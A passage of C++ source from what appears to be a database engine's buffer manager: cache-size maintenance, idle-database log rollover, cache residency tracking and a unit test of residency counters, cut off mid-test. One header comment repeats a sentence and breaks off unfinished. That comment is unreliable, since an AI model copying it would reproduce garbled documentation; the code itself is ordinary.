}
}
return err;
}
#ifndef RTM
TICK g_tickMaintCacheSizeCacheTargetLastAttempt = 0;
LONG_PTR g_cbfMaintCacheSizeCacheTargetLastAttempt = 0;
TICK g_tickMaintCacheSizeCacheTargetLast = 0;
LONG_PTR g_cbfMaintCacheSizeCacheTargetLast = 0;
TICK g_tickMaintCacheSizeLastSuccess = 0;
TICK g_tickMaintCacheSizeLastContinue = 0;
TICK g_tickMaintCacheSizeLastFailedReschedule = 0;
#endif // !RTM
// BFIMaintCacheSizeITask(): the cache sizing task.
//
// o Reschedules itself until the job is considered done, which is when the current
// cache size is less than or equal to the current set point (for shrinkage) or
// cache size gets successfully resized up (for growth); Note that it's not
// considered done if the cache target is above the optimal target. This happens
// when cbfCacheDeadlock is larger than the optimal cache size, which can happen
// if there is a significant number of pages undergoing write or are pinned by
// if a significant number of pages are undergoing writes or are pinned by
//
// o For growth, we call directly into ErrBFICacheGrow() and consider the job done
// if that call succeeds;
//
// o For shrinkage, the heavy-lifting is accomplished by BFIMaintCacheSizeIShrink().
// Clean buffers are quiesced right away. Dirty buffers have a write issued against
// them so they can be cleaned/evicted soon (most likely on the next pass);
//
// o Upon releasing the semaphore, we also check for pending requests, in which case
// we will reschedule the task so that it realizes any new changes in intention.
void BFIMaintCacheSizeITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
Assert( g_fBFMaintInitialized );
AtomicExchange( &g_cMaintCacheSizePending, 0 );
    Assert( g_semMaintCacheSize.CAvail() == 0 /* as close to FOwner() as we can get */ );
OnDebug( g_cMaintCacheSizeReqAcquireFailures = 0 );
g_tickLastMaintCacheSize = TickOSTimeCurrent();
// maintain our cache size
const LONG_PTR cbfCacheSizeStart = cbfCacheSize;
const __int64 cbCacheSizeStart = CbBFICacheBufferSize();
const LONG_PTR cbfCacheTargetT = cbfCacheTarget;
OnNonRTM( g_tickMaintCacheSizeCacheTargetLastAttempt = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheSizeCacheTargetLastAttempt = cbfCacheTargetT );
if ( cbfCacheTargetT > cbfCacheSize )
{
(void)ErrBFICacheGrow();
}
else if ( ( cbfCacheTargetT < cbfCacheSize ) ||
( g_cbfCacheTargetOptimal < cbfCacheTarget ) ) // force re-evaluation of cache sizing.
{
BFIMaintCacheSizeIShrink();
}
// determine if our job is done.
// note that it won't be considered done if the target is above optimal (i.e., deadlock protection is active), unless
// we're running on battery-based systems, in which case we're prioritizing quiescing the task over getting to the
// optimal size.
const BOOL fDone = ( cbfCacheSize == cbfCacheTarget ) && ( ( g_cbfCacheTargetOptimal >= cbfCacheTarget ) || FUtilSystemRestrictIdleActivity() );
OnNonRTM( g_tickMaintCacheSizeCacheTargetLast = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheSizeCacheTargetLast = cbfCacheTarget );
if ( fDone )
{
OnNonRTM( g_tickMaintCacheSizeLastSuccess = TickOSTimeCurrent() );
}
else
{
OnNonRTM( g_tickMaintCacheSizeLastContinue = TickOSTimeCurrent() );
}
const LONG_PTR cbfCacheSizeStop = cbfCacheSize;
const __int64 cbCacheSizeStop = CbBFICacheBufferSize();
Unused( cbfCacheSizeStart );
Unused( cbCacheSizeStart );
Unused( cbfCacheSizeStop );
Unused( cbCacheSizeStop );
OSTrace(
        JET_tracetagBufferManagerMaintTasks, // this logs a bit more than I had wanted this tag to ...
OSFormat(
"%s: changed cache size by %I64d buffers (from %I64d to %I64d), %I64d bytes (from %I64d to %I64d)",
__FUNCTION__,
(__int64)( cbfCacheSizeStop - cbfCacheSizeStart ),
(__int64)cbfCacheSizeStart,
(__int64)cbfCacheSizeStop,
cbCacheSizeStop - cbCacheSizeStart,
cbCacheSizeStart,
cbCacheSizeStop
) );
// if we have not completed our maintenance of the cache size then
// try to schedule another attempt in the near future
if ( !fDone )
{
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheSizeITask,
NULL,
dtickMaintCacheSizeRetry,
0 ) < JET_errSuccess )
{
// we have now lost our right to make async requests
(void)ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending();
OnNonRTM( g_tickMaintCacheSizeLastFailedReschedule = TickOSTimeCurrent() );
}
else
{
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Size Maintenance", __FUNCTION__ ) );
}
}
else
{
(void)ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending();
}
Assert( g_fBFMaintInitialized );
}
// Releases a buffer's memory usage, thus reducing our total committed cache
void BFIReleaseBuffer( PBF pbf )
{
Assert( g_critCacheSizeResize.FOwner() );
// mark this BF as quiesced
Assert( IbfBFICachePbf( pbf ) < cbfCacheAddressable );
Assert( !pbf->fQuiesced );
AtomicDecrement( (LONG*)&g_cbfCacheClean );
cbfCacheSize--; // atomic not required
Assert( cbfCacheSize >= 0 );
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
OnDebug( const BOOL fWasAvailable = pbf->fAvailable );
pbf->fAvailable = fFalse;
pbf->fQuiesced = fTrue;
g_bfquiesced.InsertAsNextMost( pbf ); // insert at the tail (next-most).
// release the memory owned by this BF if possible
Assert( ( pbf->icbBuffer == icbPage0 ) || ( (DWORD)g_rgcbPageSize[pbf->icbBuffer] >= OSMemoryPageCommitGranularity() ) );
if ( pbf->bfat == bfatFracCommit )
{
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsNotCommitted );
Expected( bfrsOld != bfrsNotCommitted || fWasAvailable );
Assert( pbf->icbBuffer != icbPage0 || bfrsOld == bfrsNotCommitted );
if ( pbf->icbBuffer != icbPage0 )
{
// Dehydrate to 0. It should never fail because we're shrinking.
CallS( ErrBFISetBufferSize( pbf, icbPage0, fFalse ) );
}
}
pbf->sxwl.ReleaseOwnership( bfltWrite );
BFIAssertNewlyAllocatedPage( pbf, fTrue );
}
// shrinks the cache from its current size down to the set point
#ifndef RTM
TICK g_tickCacheShrinkLast = 0;
#endif // !RTM
void BFIMaintCacheSizeIShrink()
{
Assert( g_semMaintCacheSize.CAvail() == 0 );
if ( !g_semMaintScavenge.FTryAcquire() )
{
return;
}
OnNonRTM( g_tickCacheShrinkLast = TickOSTimeCurrent() );
(void)ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fFalse );
g_semMaintScavenge.Release();
}
#ifndef RTM
TICK g_tickMaintCacheSizeAcquireLast = 0;
TICK g_tickMaintCacheSizeReleaseLast = 0;
TICK g_tickMaintCacheSizeReleaseAndRescheduleLast = 0;
TICK g_tickMaintCacheSizeRescheduleLastAttempt = 0;
TICK g_tickMaintCacheSizeRescheduleLastSuccess = 0;
#endif // !RTM
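// registers a pending cache size request and tries to acquire the cache size maintenance
// semaphore; the pending count lets the current owner notice requests that arrive while it
// holds the semaphore (see ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending())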
INLINE BOOL FBFIMaintCacheSizeAcquire()
{
AtomicIncrement( &g_cMaintCacheSizePending );
if ( g_semMaintCacheSize.FTryAcquire() )
{
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfCacheSize;
OnNonRTM( g_tickMaintCacheSizeAcquireLast = g_tickMaintCacheSizeStartedLast );
return fTrue;
}
return fFalse;
}
INLINE ERR ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending()
{
ERR err = JET_errSuccess;
OnNonRTM( g_tickMaintCacheSizeReleaseAndRescheduleLast = TickOSTimeCurrent() );
Assert( g_fBFMaintInitialized );
Assert( g_semMaintCacheSize.CAvail() == 0 );
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive;
g_semMaintCacheSize.Release();
OnNonRTM( g_tickMaintCacheSizeReleaseLast = TickOSTimeCurrent() );
if ( g_cMaintCacheSizePending > 0 &&
g_semMaintCacheSize.FTryAcquire() )
{
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfCacheSize;
OnNonRTM( g_tickMaintCacheSizeRescheduleLastAttempt = g_tickMaintCacheSizeStartedLast );
// If there are pending requests, try and run cache resizing asynchronously.
// Instead of releasing the semaphore, testing for pending requests
// and trying to reacquire the semaphore to resize, one could consider
// testing for pending requests before releasing to avoid losing the
// semaphore temporarily. The problem with that approach is that there
// could be a small window where someone interested in resizing
// has not incremented the count yet, then we think there are no
        // pending requests and proceed to releasing the semaphore without
// resizing. In the meantime, the other thread may try and grab the
// semaphore before we release it and so it will fail to resize and
        // will have its pending request go unnoticed.
err = ErrBFIMaintScheduleTask( g_posttBFIMaintCacheSizeITask,
NULL,
dtickMaintCacheSizeRequest,
0 );
if ( err < JET_errSuccess )
{
Assert( g_semMaintCacheSize.CAvail() == 0 );
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive;
g_semMaintCacheSize.Release();
OnNonRTM( g_tickMaintCacheSizeReleaseLast = TickOSTimeCurrent() );
}
else
{
OnNonRTM( g_tickMaintCacheSizeRescheduleLastSuccess = TickOSTimeCurrent() );
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Size Maintenance", __FUNCTION__ ) );
}
}
Assert( g_fBFMaintInitialized );
return err;
}
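// returns how long the cache size maintenance pass currently in flight has been running,
// or 0 if none is active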
TICK DtickBFIMaintCacheSizeDuration()
{
if ( g_fBFInitialized && g_semMaintCacheSize.CAvail() == 0 )
{
return DtickDelta( g_tickMaintCacheSizeStartedLast, TickOSTimeCurrent() );
}
else
{
return 0;
}
}
// Idle Database
CSemaphore g_semMaintIdleDatabaseRequest( CSyncBasicInfo( _T( "g_semMaintIdleDatabaseRequest" ) ) );
TICK g_tickMaintIdleDatabaseLast;
POSTIMERTASK g_posttBFIMaintIdleDatabaseITask = NULL;
inline const char* BFFormatLGPOS( const LGPOS* const plgpos )
{
return OSFormat( "%05lX,%04hX,%04hX",
INT( plgpos->lGeneration ),
SHORT( plgpos->isec ),
SHORT( plgpos->ib ) );
}
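// requests idle database maintenance on behalf of the given BF: tracks the newest lgposModify
// pinned by the waypoint for the BF's database and, if possible, schedules the idle database
// maintenance task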
void BFIMaintIdleDatabaseRequest( PBF pbf )
{
// if this buffer contains a page that is pinned in memory by the waypoint
// and its lgposModify is more recent than the newest lgposModify we have
// seen for this database then save that lgposModify as the new high water
// mark for pages pinned by the waypoint for that database in the cache
FMP* const pfmp = &g_rgfmp[ pbf->ifmp ];
const LGPOS lgposWaypoint = pfmp->LgposWaypoint();
if ( CmpLgpos( &pbf->lgposModify, &lgposMin ) != 0 &&
CmpLgpos( &lgposWaypoint, &lgposMin ) != 0 &&
CmpLgpos( &pbf->lgposModify, &lgposWaypoint ) >= 0 )
{
// we may already have entered this lock as a reader so disable our
// deadlock detection and ownership tracking temporarily to allow us
// to enter the lock recursively as a reader. we manually assert that
// we do not own it as a writer because that would cause a deadlock
        // try to acquire the right to perform bookkeeping
Assert( pfmp->FNotBFContextWriter() );
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
BOOL fAcquiredBook = pfmp->FTryEnterBFContextAsReader();
if ( fAcquiredBook )
{
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
Assert( pbffmp );
if ( CmpLgpos( &pbf->lgposModify, &pbffmp->lgposNewestModify ) > 0 )
{
if ( pbf->lgposModify.lGeneration > pbffmp->lgposNewestModify.lGeneration )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: ipinst %s, ifmp %s has new pinned pages (lgposNewestModify = %s; lgposWaypoint = %s)",
__FUNCTION__,
OSFormatUnsigned( IpinstFromPinst( PinstFromIfmp( pbf->ifmp ) ) ),
OSFormatUnsigned( pbf->ifmp ),
BFFormatLGPOS( &pbf->lgposModify ),
BFFormatLGPOS( &lgposWaypoint ) ) );
}
pbffmp->lgposNewestModify = pbf->lgposModify;
}
pfmp->LeaveBFContextAsReader();
}
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
// try to acquire the right to request idle database maintenance
BOOL fAcquiredAsync = g_semMaintIdleDatabaseRequest.FTryAcquire();
// if we acquired the right to maintain the databases, then we will try
// to do so
if ( fAcquiredAsync )
{
// schedule a task to maintain the idle databases
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintIdleDatabaseITask, NULL, dtickMaintIdleDatabaseDelay, 0 ) >= JET_errSuccess )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: Idle Database Maintenance Scheduled",
__FUNCTION__ ) );
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintIdleDatabaseRequest.CAvail() == 0 );
g_semMaintIdleDatabaseRequest.Release();
}
}
void BFIMaintIdleDatabaseITask( void*, void* )
{
// this task automatically has the right to async maintenance
BOOL fAcquiredAsync = fTrue;
// maintain our idle databases
BFIMaintIdleDatabaseIRollLogs();
// remember the time when we last maintained the idle databases
g_tickMaintIdleDatabaseLast = TickOSTimeCurrent();
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintIdleDatabaseRequest.CAvail() == 0 );
g_semMaintIdleDatabaseRequest.Release();
}
}
BOOL FBFIMaintIdleDatabaseIDatabaseHasPinnedPages( const INST * const pinst, const DBID dbid )
{
const IFMP ifmp = pinst->m_mpdbidifmp[ dbid ];
FMP* const pfmp = &g_rgfmp[ ifmp ];
BOOL fPinnedPages = fFalse;
if ( ifmp >= g_ifmpMax || !pfmp->FAttached() )
{
fPinnedPages = fFalse;
}
else
{
// read the newest lgposModify of any BF for which idle database
// maintenance was requested for this database
pfmp->EnterBFContextAsReader();
const BFFMPContext* const pbffmp = (BFFMPContext*)pfmp->DwBFContext();
const LGPOS lgposNewestModify = ( pbffmp && pbffmp->fCurrentlyAttached ) ? pbffmp->lgposNewestModify : lgposMin;
pfmp->LeaveBFContextAsReader();
// read the current waypoint
const LGPOS lgposWaypoint = pfmp->LgposWaypoint();
// if the newest lgposModify is valid and the current waypoint is
// valid and the newest lgposModify is newer than the waypoint
// then remember that this instance has pages pinned by the
// waypoint
if ( CmpLgpos( &lgposNewestModify, &lgposMin ) != 0 &&
CmpLgpos( &lgposWaypoint, &lgposMin ) != 0 &&
CmpLgpos( &lgposNewestModify, &lgposWaypoint ) >= 0 )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s, ifmp %s has pinned pages (lgposNewestModify = %s; lgposWaypoint = %s)",
__FUNCTION__,
OSFormatPointer( pinst ),
OSFormatUnsigned( ifmp ),
BFFormatLGPOS( &lgposNewestModify ),
BFFormatLGPOS( &lgposWaypoint ) ) );
fPinnedPages = fTrue;
}
}
return fPinnedPages;
}
void BFIMaintIdleDatabaseIRollLogs( INST * const pinst )
{
// Roll logs for one instance. The instance should be locked already
BOOL fPinnedPages = fFalse;
for ( DBID dbid = dbidMin; dbid < dbidMax; dbid++ )
{
fPinnedPages = fPinnedPages || FBFIMaintIdleDatabaseIDatabaseHasPinnedPages( pinst, dbid );
}
// if this instance has pages that are pinned by the waypoint and
// we have not generated a new log in this instance recently then
// force the log to rollover to help unpin some of those pages
TICK dtickLogRollMin = 24 * 60 * 60 * 1000; // 1 day in ticks, just for defense in depth.
if ( FDefaultParam( pinst, JET_paramPeriodicLogRolloverLLR ) )
{
if ( UlParam( pinst, JET_paramWaypointLatency ) )
{
dtickLogRollMin = dtickMaintIdleDatabaseClearLLR / (ULONG)UlParam( pinst, JET_paramWaypointLatency );
dtickLogRollMin = max( 30 * 1000, dtickLogRollMin ); // just in case
}
}
else
{
dtickLogRollMin = (ULONG)UlParam( pinst, JET_paramPeriodicLogRolloverLLR ) * 1000;
}
if ( fPinnedPages &&
!pinst->m_plog->FLGRolloverInDuration( dtickLogRollMin ) )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s has pinned pages and hasn't rolled a log for %s ms (tickNow = %s)",
__FUNCTION__,
OSFormatPointer( pinst ),
OSFormatUnsigned( dtickLogRollMin ),
OSFormatUnsigned( TickOSTimeCurrent() ) ) );
const ERR err = ErrLGForceLogRollover( pinst, __FUNCTION__ );
if ( err < JET_errSuccess )
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s failed to roll a new log with error %s",
__FUNCTION__,
OSFormatPointer( pinst ),
OSFormatSigned( err ) ) );
}
else
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: pinst %s rolled a new log",
__FUNCTION__,
OSFormatPointer( pinst ) ) );
}
}
}
void BFIMaintIdleDatabaseIRollLogs()
{
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: Beginning Idle Database Maintenance",
__FUNCTION__ ) );
// for each initialized instance
for ( size_t ipinst = 0; ipinst < g_cpinstMax; ipinst++ )
{
extern CRITPOOL< INST* > g_critpoolPinstAPI;
CCriticalSection * const pcritInst = &g_critpoolPinstAPI.Crit(&g_rgpinst[ipinst]);
pcritInst->Enter();
INST * const pinst = g_rgpinst[ ipinst ];
if ( pinstNil == pinst )
{
pcritInst->Leave();
}
else
{
            // Use APILock to exclude concurrent initialization and
            // termination of the instance.
const BOOL fAPILocked = pinst->APILock( pinst->fAPICheckpointing );
pcritInst->Leave();
if ( fAPILocked )
{
if ( pinst->m_fJetInitialized )
{
BFIMaintIdleDatabaseIRollLogs( pinst );
}
pinst->APIUnlock( pinst->fAPICheckpointing );
}
}
}
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: Ending Idle Database Maintenance",
__FUNCTION__ ) );
}
// Cache residency map
//
// Functions interested in consuming the residency map should call BFIMaintCacheResidencyRequest().
// The timestamp of the last interested consumer will be stored in g_tickLastUpdateStatisticsRequest and will
// only be updated roughly every tenth of dtickMaintCacheResidencyPeriod to avoid excessive concurrency in
// updating that global variable by very hot codepaths.
// dtickMaintCacheResidencyTooOld is used to short-circuit BFIMaintCacheResidencyRequest() early and avoid
// the interlocked operation on g_fUpdateStatisticsMayRequest.
// The task looks at g_tickLastUpdateStatisticsRequest and decides to cancel the task if more than
// dtickMaintCacheResidencyQuiesce has elapsed since the last interested consumer. The task will only be
// re-enabled after dtickMaintCacheResidencyTooOld has elapsed since the last update to the residency map
// and there is someone interested.
//
TICK g_tickLastUpdateStatisticsRequest = 0;
LONG g_fUpdateStatisticsMayRequest = fFalse;
BOOL g_fMaintCacheResidencyInit = fFalse;
BOOL g_fEnabledCacheResidencyTask = fTrue;
POSTIMERTASK g_posttBFIMaintCacheResidencyITask = NULL;
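// primes the residency tracking timestamps so that the first residency request after init is
// immediately allowed to schedule the residency maintenance task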
void BFIMaintCacheResidencyInit()
{
Assert( !g_fUpdateStatisticsMayRequest );
Assert( !g_fMaintCacheResidencyInit );
const TICK tickNow = TickOSTimeCurrent();
g_tickLastUpdateStatistics = tickNow - dtickMaintCacheResidencyTooOld;
g_tickLastUpdateStatisticsRequest = tickNow - dtickMaintCacheResidencyQuiesce;
g_fMaintCacheResidencyInit = fTrue;
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
void BFIMaintCacheResidencyTerm()
{
// at this point, we expect the g_blBFMaintScheduleCancel binary lock to have prevented new tasks from
// being issued, so we will cancel/wait for any pending/executing ones and finally set the flag
// to fFalse.
g_fMaintCacheResidencyInit = fFalse;
if ( g_posttBFIMaintCacheResidencyITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCacheResidencyITask );
}
AtomicExchange( &g_fUpdateStatisticsMayRequest, fFalse );
Assert( !g_fMaintCacheResidencyInit );
Assert( !g_fUpdateStatisticsMayRequest );
}
INLINE void BFIMaintCacheResidencyRequest()
{
// if view-cache is enabled, there isn't much point in collecting memory page residency
// information because clean pages are mapped and would show up as non-resident anyways.
// because of that, the code to handle non-resident pages (hard-faulting from DB file)
// is not applicable to view-cache.
// dirty pages are part of our working set even in view-cache, but they always need to be
// hard-faulted from the page file, so no need to collect residency information in this case
// either.
if ( BoolParam( JET_paramEnableViewCache ) )
{
return;
}
// if the task is enabled
if ( g_fEnabledCacheResidencyTask &&
( g_fEnabledCacheResidencyTask = !FUtilSystemRestrictIdleActivity() ) )
{
const TICK tickNow = TickOSTimeCurrent();
// this may go slightly backwards but it is not a big deal
if ( DtickDelta( g_tickLastUpdateStatisticsRequest, tickNow ) >= dtickMaintCacheResidencyPeriod / 10 )
{
g_tickLastUpdateStatisticsRequest = tickNow;
}
// quick check to see if we can schedule a task
if ( DtickDelta( g_tickLastUpdateStatistics, tickNow ) >= dtickMaintCacheResidencyTooOld &&
AtomicCompareExchange( &g_fUpdateStatisticsMayRequest, fTrue, fFalse ) == fTrue )
{
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheResidencyITask,
NULL,
dtickMaintCacheResidencyPeriod,
0 ) < JET_errSuccess )
{
// if we are quiescing to terminate BF, don't re-enable scheduling tasks.
if ( g_fMaintCacheResidencyInit )
{
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
}
}
}
}
// BFIMaintCacheResidencyITask(): the cache residency maintenance task.
//
// o Heavy-lifting is accomplished by ErrBFICacheUpdateStatistics(), which builds a bitmap
// of whether buffers are resident in memory;
//
// o Quiesces itself when the last interest party expressed its interest longer than
// a certain threshold ago.
void BFIMaintCacheResidencyITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
Assert( !g_fUpdateStatisticsMayRequest );
(void)ErrBFICacheUpdateStatistics();
// should we quiesce the task?
const ERR errForceQuiesce = ErrFaultInjection( 54947 );
if ( DtickDelta( g_tickLastUpdateStatisticsRequest, TickOSTimeCurrent() ) >= dtickMaintCacheResidencyQuiesce ||
errForceQuiesce != JET_errSuccess ||
!( g_fEnabledCacheResidencyTask = !FUtilSystemRestrictIdleActivity() )
)
{
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
else if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheResidencyITask,
NULL,
dtickMaintCacheResidencyPeriod,
0 ) < JET_errSuccess )
{
AtomicExchange( &g_fUpdateStatisticsMayRequest, fTrue );
}
}
INLINE void BFIUpdateResidencyStatsAfterResidencyFlag( const BFResidenceState bfrsOld, const BFResidenceState bfrsNew )
{
// Unexpected parameters.
Expected( bfrsOld != bfrsMax );
Expected( bfrsNew != bfrsMax );
// Unexpected transitions.
Expected( !( bfrsOld == bfrsNotCommitted && bfrsNew == bfrsNotResident ) );
Expected( !( bfrsOld == bfrsNewlyCommitted && bfrsNew == bfrsNewlyCommitted ) );
Expected( !( bfrsOld == bfrsNewlyCommitted && bfrsNew == bfrsNotResident ) );
Expected( !( bfrsOld == bfrsNotResident && bfrsNew == bfrsNewlyCommitted ) );
Expected( !( bfrsOld == bfrsNotResident && bfrsNew == bfrsNotResident ) );
Expected( !( bfrsOld == bfrsResident && bfrsNew == bfrsNewlyCommitted ) );
// Same state. Bail out.
if ( bfrsOld == bfrsNew )
{
return;
}
// Need to update g_cbfCommitted.
if ( bfrsNew == bfrsNotCommitted )
{
// Subtract.
AtomicDecrement( (LONG*)&g_cbfCommitted );
}
else if ( bfrsOld == bfrsNotCommitted )
{
// Add.
AtomicIncrement( (LONG*)&g_cbfCommitted );
}
// Need to update g_cbfNewlyCommitted.
if ( bfrsNew == bfrsNewlyCommitted )
{
// Add.
AtomicIncrement( (LONG*)&g_cbfNewlyCommitted );
}
else if ( bfrsOld == bfrsNewlyCommitted )
{
// Subtract.
AtomicDecrement( (LONG*)&g_cbfNewlyCommitted );
}
// Need to update g_cbfCacheResident.
if ( bfrsNew == bfrsResident )
{
// Add.
AtomicIncrement( &g_cbfCacheResident );
}
else if ( bfrsOld == bfrsResident )
{
// Subtract.
AtomicDecrement( &g_cbfCacheResident );
}
}
INLINE BFResidenceState BfrsBFIUpdateResidentState( PBF const pbf, const BFResidenceState bfrsNew )
{
const BFResidenceState bfrsOld = (BFResidenceState)AtomicExchange( (LONG*)&pbf->bfrs, (LONG)bfrsNew );
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsOld, bfrsNew );
return bfrsOld;
}
INLINE BFResidenceState BfrsBFIUpdateResidentState( PBF const pbf, const BFResidenceState bfrsNew, const BFResidenceState bfrsIfOld )
{
const BFResidenceState bfrsOld = (BFResidenceState)AtomicCompareExchange( (LONG*)&pbf->bfrs, (LONG)bfrsIfOld, (LONG)bfrsNew );
if ( bfrsOld == bfrsIfOld )
{
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsOld, bfrsNew );
}
return bfrsOld;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BFIUpdateResidencyStatsAfterResidencyFlag )
{
const DWORD cbfCommittedInit = 50;
const DWORD cbfNewlyCommittedInit = 10;
const LONG cbfCacheResidentInit = 20;
// bfrsNotCommitted -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotCommitted, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNotCommitted -> bfrsNewlyCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotCommitted, bfrsNewlyCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit + 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit + 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNotCommitted -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotCommitted, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit + 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit + 1 );
// bfrsNewlyCommitted -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNewlyCommitted, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit - 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNewlyCommitted -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNewlyCommitted, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit - 1 );
CHECK( g_cbfCacheResident == cbfCacheResidentInit + 1 );
// bfrsNotResident -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotResident, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit );
// bfrsNotResident -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsNotResident, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit + 1 );
// bfrsResident -> bfrsNotCommitted.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsResident, bfrsNotCommitted );
CHECK( g_cbfCommitted == cbfCommittedInit - 1 );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit - 1 );
// bfrsResident -> bfrsNotResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsResident, bfrsNotResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
CHECK( g_cbfCacheResident == cbfCacheResidentInit - 1 );
// bfrsResident -> bfrsResident.
g_cbfCommitted = cbfCommittedInit;
g_cbfNewlyCommitted = cbfNewlyCommittedInit;
g_cbfCacheResident = cbfCacheResidentInit;
BFIUpdateResidencyStatsAfterResidencyFlag( bfrsResident, bfrsResident );
CHECK( g_cbfCommitted == cbfCommittedInit );
CHECK( g_cbfNewlyCommitted == cbfNewlyCommittedInit );
